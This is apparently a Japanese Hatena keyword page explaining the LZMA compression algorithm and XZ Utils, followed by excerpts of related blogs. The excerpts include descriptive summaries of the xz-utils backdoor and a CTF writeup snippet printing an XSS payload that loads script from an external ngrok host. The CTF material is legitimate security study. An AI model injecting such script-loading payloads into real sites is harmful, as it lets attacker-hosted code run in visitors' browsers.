LZMA

このタグでブログを書く

言葉の解説

ネットで話題

LZMA

(コンピュータ)

【えるぜっとえむえー】

Lempel-Ziv-Markov Chain Algorithm の略。LZ77 を改良し、高圧縮で高速・省メモリな復元を実現した圧縮アルゴリズム。7-zip に使われていることなどで有名。bzip2 や PPMD と同程度の高圧縮率を実現しているにも関わらず、復元が高速であることが特徴。圧縮にそれなりの時間・空間を要し、復元は高速かつ省メモリないわゆる distributed algorithm である。

XZ Utils

LZMA を用いた圧縮ライブラリである XZ Utils (http://tukaani.org/xz/) を用いることで tar アーカイブを圧縮し、配布することができる。XZ Utils で拡張子は tar.xz となる。tar コマンドのオプションで J を付加することで圧縮・復元が可能。

LZMA アルゴリズムのあらまし

LZMA が高圧縮率を達成できる理由は幾つかある。以下は参考文献 [1] からの要約である。

Repeated Offsets

LZ77法ではスライディングウィンドウ中から最長一致する部分文字列を探しだし、それをマッチ情報 (位置情報、長さ) に置き換える。

このとき、バイナリデータや表形式データでは、一定間隔で同じ情報が表れやすいという特徴がある。そこで LZMA では、マッチ情報を単なるマッチ情報として出力するのではなく、繰り返しマッチングが発生した場合は、その毎回のオフセット距離で保存する。この毎回のオフセット距離は LRU リストで管理され、出力には 4 要素の LRU のスロット番号が利用される。これを Repeated Offsets を呼ぶ。

Repeated Offsets を用いると、繰り返しマッチする情報は、偏った出現回数でのより短い整数で表現することができる。これにより圧縮率が向上する。(考え方としては Move to Front と同じ類と思われる)

Binary Range Coder

LZMA では、前述の Repeated Offsets の開始フラグや LRU のスロット番号など2値の値あるいは非常に小さな値を符号化することになる。この符号化に Binary Range Coder を用いる。

Binary Range Coder は二値に特化した Range Coder で、二値しか扱わないことを前提に、汎用の Range Coder で必要になる各種処理 (ベースラインの更新、累積確率表の更新、累積頻度表からの記号の発見) をスキップし、高速化、空間効率を上げた実装である。

コンテキストに基づいた確率分布

LZMA は、文字を符号化するにあたって直前の符号化の状態をコンテキストとして利用する。マッチングがあった、なかった、Repeated Offsets でマッチしたといった各種直前の状態をオートマトンで表現し、これから符号化しようとするのが、マッチングか、Repeated Offsets か、記号かのいずれかによって状態遷移を行う。

LZMA は 12 状態を用意し、その 12 状態それぞれに確率表を分けて、この確率表を Binary Range Coder で利用することにより圧縮率を高める。

最適マッチング

LZMA は符号化にあたって、最適マッチングを行う。具体的には、マッチングを今行う、あとで行う、Repeated Offsets を採用する、記号を符号化するという選択肢の中から最適なものを選ぶ。ただし、ある程度は最長一致を優先的に選択する妥協策も採っているとのこと。

参考文献

[1] 岡野原大輔, "LZMA圧縮/bzip2圧縮/PPMD圧縮 7zipで使われている圧縮技術", C Magazine 2006年 1月号, ソフトバンククリエイティブ, 2006

参考URL

圧縮・解凍ソフト 7-Zip
LZMA SDK (Software Development Kit)
The Tukaani Project XZ Utils の配布先
静かな注目を集める圧縮アルゴリズム「LZMA」 - ITmedia エンタープライズ
Lempel–Ziv–Markov chain algorithm - Wikipedia
A Quick Benchmark: Gzip vs. Bzip2 vs. LZMA ベンチマーク。復号処理は gzip よりは 2 ~ 3 倍遅いものの、bzip2 よりはかなり高速

このタグの解説について

この解説文は、すでに終了したサービス「はてなキーワード」内で有志のユーザーが作成・編集した内容に基づいています。その正確性や網羅性をはてなが保証するものではありません。問題のある記述を発見した場合には、お問い合わせフォームよりご連絡ください。

はまやんはまやんはまやん•9日前

b01lers CTF 2024 Writeups

web/b01ler-ad web/3-city-elves-writeups web/imagehost web/pwnhub web/b01lers_casino web/b01ler-ad const content = req.body.content.replace("'", '').replace('"', '').replace("`", ''); '"`が使えない状態でXSSさせる問題。それ以外の制約は特にないので、以下のようにscriptタグのソースで外部からjsを持ってきて使えばいい。 <script src=//c748-194-180-179-191.ngrok-fr…

ネットで話題

67ブックマーク静かな注目を集める圧縮アルゴリズム「LZMA」

www.itmedia.co.jp

40ブックマーク「7-Zip」に任意コード実行の脆弱性、修正版のv18.05が公開～「PeaZip」なども更新／LZMA/LZMA2圧縮のパフォーマンス向上をはじめとする改善も

forest.watch.impress.co.jp

21ブックマーク GitHub - Genivia/ugrep: 🔍NEW ugrep v3.9: ultra fast grep with interactive TUI, fuzzy search, boolean queries, hexdumps and more: search file systems, source code, text, binary files, archives (cpio/tar/pax/zip), compressed files (gz/Z/bz2/lzma/xz/lz4/zst

github.com

11ブックマーク Compress-LZMA-Simple-0.2 - simple utility of LZMA compression/decompression - metacpan.org To install Compress::LZMA::Simple, copy and paste the appropriate command in to your terminal. cpanm cpanm Compress::LZMA::Simple CPAN shell perl -MCPAN -e shell install Compress::LZMA::Simple For more information on module installation, please visit the detailed CPAN module installation guide.

metacpan.org

10ブックマーク LZMA圧縮されたファイルの扱いについて - 試験運用中なLinux備忘録・旧記事

kakurasan.hatenadiary.jp

9ブックマーク GitHub - richgel999/lzham_codec: Lossless data compression codec with LZMA-like ratios but 1.5x-8x faster decompression speed, C/C++

github.com

7ブックマーク LZMA SDK (Software Development Kit)What's new: 23.01: New filter for ARM64 executables. BCJ2 filter was improved for better compression ratio. Some bugs were fixed. 21.07: Some minor changes and fixes. 21.06: The bug in LZMA encoding function was fixed. 21.03 beta: LZMA dicrionary up to 4 GB. Speed optimizations. 21.02 alpha: macO...

7-zip.org

7ブックマーク Quick Benchmark: Gzip vs Bzip2 vs LZMA vs XZ vs LZ4 vs LZO - CatchChallenger wiki Selected archives I have selected: Source of the kernel to test source compression Stream protocol with flush Test conditions Tests were run on a desktop: Intel Core i5 CPU 750 at 2.67GHz 8GB of DDR3 memory tmpfs as ram disk is used Linux kernel 3.3.2, gentoo amd64 CFLAGS: -pipe -O2 -g -floop-blo...

pokecraft.first-world.info

7ブックマーク LZMA SDK (Software Development Kit)変更点: 23.01: ARM64実行ファイル用の新しいフィルター。BCJ2フィルターが改良され、圧縮率が向上。幾つかのバグが修正。 21.07: いくつかのマイナーな変更と修正 21.06: LZMAエンコーディング機能のバグを修正 21.03 beta: LZMAの辞書サイズを4GBへアップ、速度の最適化 21.02 alpha: macOSとLinuxのサポート、速度の...

7-zip.opensource.jp

関連ブログ

Nishiki-Hub•10日前

「xz-utils」バックドア問題のまとめと今後の予定

本日の内容 3月下旬にバックドアが仕組まれていることが判明して以降、半月にわたってxz-utilsの話題でもちきりでしたが、今回は現在までのxzバックドア問題の振り返りとこの先の予定についてわかっている事をまとめます。

大破雑記帳•19日前

V-80

しばらく前からMarvellの64bit ARM搭載機であることを把握しており、少し気になっていたもの。最近になってまた気になりだしてしまい、丁度中古で安価な出品もあったことから、結局確保してしまった。サポートできるかわからないものの、弄っていくのでメモ。 Switch, PHY 未確認 zone WAN LAN port (WSR-2533DHPLS) INTERNET LAN1 LAN2 LAN3 port (MT7530) port0 port1 port2 port3 MAC mmcblk1boot0は少なくともU-Boot本体とU-Boot環境変数領域の2つを含んでいる領域 LA…

piyolog•24日前

XZ Utilsの脆弱性 CVE-2024-3094 についてまとめてみた

2024年3月29日、Linux向け圧縮ユーティリティとして広く利用されているXZ Utilsに深刻な脆弱性 CVE-2024-3094 が確認されたとして、研究者やベンダがセキュリティ情報を公開しました。この脆弱性は特定の条件下においてバックドアとして悪用される恐れがあるものとみられており、当該ソフトウエアのメンテナのアカウントにより実装されたソフトウエアサプライチェーン攻撃の可能性が指摘されています。ここでは関連する情報をまとめます。脆弱性の概要 xzとは主要なLinuxディストリビューションに含まれる汎用的なデータ圧縮形式で、今回問題が確認されたのはその圧縮・解凍ユーティリティであるl…

大破雑記帳•1ヶ月前

WSR-2533DHPL2 stock -> OpenWrt

WSR-2533DHPLSに続き、こちらも大体構成できたので投入テスト。 DHPLS同様、Image1 (Kernel)に書き込まれて再起動し、U-BootがImage1と2のチェックを行い、データが異なるのでImage1から2へのコピーが発生する。ブートはImage1。 NAND Flash上のOpenWrtで使用できる領域がWSR-2533DHPLSの2倍以上なので、OpenWrtブート後に利用可能な領域も大きい。ただしRAMは半分の128MiB。 The tail length is 46! Update len to 11796724! decodesize 11796480... c…

大破雑記帳•1ヶ月前

WSR-2533DHPLS stock -> OpenWrt

ファームウェアの生成や取り扱い周りを大体実装し終わったので、いくつかの投入方法でテストしたうちのWebUIからfactoryイメージを投入したもの Flash内のImage1 (Kernel)に書き込まれ再起動した際、U-Bootによって2つのOSイメージがチェックされ、Image1とImage2で異なるのでImage1から2へコピーされた上でImage1からブートしている hostsacd_daily_proc(145):HSAC-DBG:DATE[2024/3/30 9:45:32] 1711759532 154 154280(4) loggerdb:1319 The tail lengt…

間違いだらけの備忘録•1ヶ月前

Ken Thompsonの(loginへの)トロイの木馬の現代(open-ssh)版

security.sios.jp xzのtarボールで、アップストリームバージョンの5.6.0以降に悪意のあるコードが混入されていることがわかりました。liblzmaビルドプロセスにおいて複雑な難読化を用いてソースコード内の偽装テストファイルからビルド済みオブジェクトファイルを抽出します。このファイルは、liblzmaコード内の特定の関数を変更するために使用されます。難読化してテストで入れ込むの手が込んでるな。そして良く見付けたなという感でじっくり見ていったら。 postgresqlのmicro-benchmarkしてたところ, username間違えてログインしてるのにsshdがCPU使…

大破雑記帳•1ヶ月前

WSR-2533DHPLS

しばらく前に市川大野のハードオフに行った際に見付け、MT7621であることを把握しており少し悩んで確保したもの。他のデバイスを弄っていて放置していたら別の方によりPRがオープンされていたものの、弄っていくのでメモ。 Switch zone WAN LAN port (WSR-2533DHPLS) INTERNET LAN1 LAN2 LAN3 port (MT7530) port0 port1 port2 port3 MAC LAN: 90:96:F3:xx:xx:30 (board_data, mac (hex)) WAN: 90:96:F3:xx:xx:30 (board_data, m…

大破雑記帳•1ヶ月前

WSR-2533DHPL2

これもWMC-DLGST2同様に、定期的な通院のついでに吉川のハードオフに行ってみた際見付け、MT7621であることを把握しており確保したもの。弄っていくのでメモ。 Switch 確認中 zone WAN LAN port (WSR-2533DHPL2) INTERNET LAN1 LAN2 LAN3 port (MT7530) port0 port1 port2 port3 MAC LAN: 18:EC:E7:xx:xx:E0 (board_data, mac (hex)) WAN: 18:EC:E7:xx:xx:E0 (board_data, mac (hex)) 2.4G: 18:EC…

大破雑記帳•1ヶ月前

WMC-DLGST2 (WMC-M1267GST2, WMC-S1267GS2)

定期的な通院のついでに吉川のハードオフに行ってみたところ、ジャンクとして転がっており、セットになっている両機種ともMT7621搭載機であることを把握していて悩んだ末に確保したもの。まとめていくのでメモ。 Switch WMC-M1267GST2 zone WAN LAN port (WMC-M1267GST2) INTERNET LAN4 LAN3 LAN2 LAN1 port (MT7530) port0 port1 port2 port3 port4 WMC-S1267GS2 zone LAN port (WMC-S1267GS2) LAN4 LAN3 LAN2 LAN1 port (M…

macでインフォマティクス•1ヶ月前

パンゲノムに基づいて構造変異をコールする svarp

現在私たちが使用しているリニアなヒトリファレンスゲノムは、全世界のヒト集団のハプロタイプ多様性を表現していない。そのため、ゲノムリードのアライメントに偏りが生じ、特に多型性の高い遺伝子座における大きな構造変異（SV）の検出が制限される。したがって、多くのSV対立遺伝子は未解決のままである。グラフベースのリファレンスゲノムへの移行を目指した最近の努力の結果、最初のヒトパンゲノムのドラフトが作成されたが、パンゲノムのリファレンスゲノムに対してSVをコールするツールは現在のところ不足している。SVarpは、パンゲノムのリファレンスゲノム上にハプロタイプで分離されたSVを発見することを目的としたアルゴ…

物理の駅 Physics station by 現役研究者•2ヶ月前

ROOT: TFile形式で1億イベントのtreeのIO(入出力)速度を圧縮形式で比較する

CERN ROOT の TTreeを TFileで入出力するときの処理時間を圧縮形式ごとに比較してみる。Pythonで同様のことをやった記事も参照。 8バイト(int64_t)✕8メンバー✕1億エントリーなので、圧縮なしの場合は6.4GBのデータサイズとなる。圧縮形式ファイルサイズ出力時間読み込み時間無圧縮=0 6.40 GB 36 sec 14 sec kZLIB=1 1.23 GB 63 sec 22 sec kLZMA=2 0.24 GB 220 sec 59 sec =3 1.23 GB 62 sec 23 sec kLZ4=4 3.22 GB 37 sec 16 sec k…

日記•2ヶ月前

防衛省サイバーコンテスト 2024 writeup

32問中16問解けた。合計得点は188点で84位。あと数時間あれば… 進捗あまり参考にならないかもしれないがwriteupを置いておく。 ※解きながらwriteupを書いていたので、結局解けなかった問題についても記述してある。 Crypto Information of Certificate (10) Forensics NTFS Data Hide (10) NTFS File Delete (10) HiddEN Variable (20) NTFS File Rename (20) My Secret (30、解けなかった) Miscellaneous Une Maison (10)…

大破雑記帳•2ヶ月前

WAB-S1167-PS

WAB-I1750-PS繋がりで調べた際、WAB-S600-PS同様に認知していたもの。最近ELECOM公式でWAB-I1750-PSの在庫処分セールがあり、それが盛り上がっていた際に「WAB-S1167-PS現物か中古購入分の寄付があれば、1750と併せて作業する」と宣言した結果、寄付を頂いた為、確保した。弄っていくのでメモ。 Ethernet switchは搭載せず、QCA9557のeth0/eth1にAR803x phy 2つをそれぞれ直結。 zone LAN port (WAB-S1167-PS) PD (IN) PSE (OUT) port eth0 (AR8035) eth1 …

大破雑記帳•2ヶ月前

WAB-S600-PS

WAB-I1750-PS繋がりで調べた際、同じくQCA955xを搭載すると思われた為認知していたもの。最近ELECOM公式でWAB-I1750-PSの在庫処分セールがあり、それが盛り上がっていた際に「WAB-S1167-PS現物か中古購入分の寄付があれば、1750と併せて作業する」と宣言した結果、寄付を頂いた為、どうせならWAB-S600-PSも巻き込もうと思い至って確保した。弄っていくのでメモ。 Ethernet switchは搭載せず、QCA9557のeth0/eth1にAR803x phy2つをそれぞれ直結。 zone LAN port (WAB-S600-PS) PD (IN) P…